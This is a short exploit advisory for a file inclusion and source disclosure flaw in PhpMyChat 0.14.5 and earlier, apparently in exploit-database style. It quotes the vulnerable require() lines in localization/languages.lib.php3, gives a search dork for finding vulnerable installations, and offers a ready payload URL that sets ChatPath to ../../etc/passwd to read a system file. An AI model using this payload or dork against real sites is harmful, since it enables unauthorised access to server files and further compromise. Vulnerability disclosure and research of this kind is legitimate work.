PhpMyChat <= 0.14.5 Source Code Disclosure Vulnerability
*******************************************************************************
# Title : PhpMyChat <= 0.14.5 Source Code Disclosure Vulnerability
# Author : ajann
# Dork : phpMyChat 0.14.5 , phpMyChat
# Vuln;
*******************************************************************************
[File]
localization/languages.lib.php3
[/File]
[Code,1]
languages.lib.php3 Error:
..
....
require("./${ChatPath}config/config.lib.php3");
require("./${ChatPath}lib/database/".C_DB_TYPE.".lib.php3");
require("./${ChatPath}lib/clean.lib.php3");
....
..
Key [:] ChatPath=[file]
\Example:
http://target.com/path/localization/languages.lib.php3?ChatPath=../../etc/passwd
# ajann,Turkey
# ...
# Im not Hacker!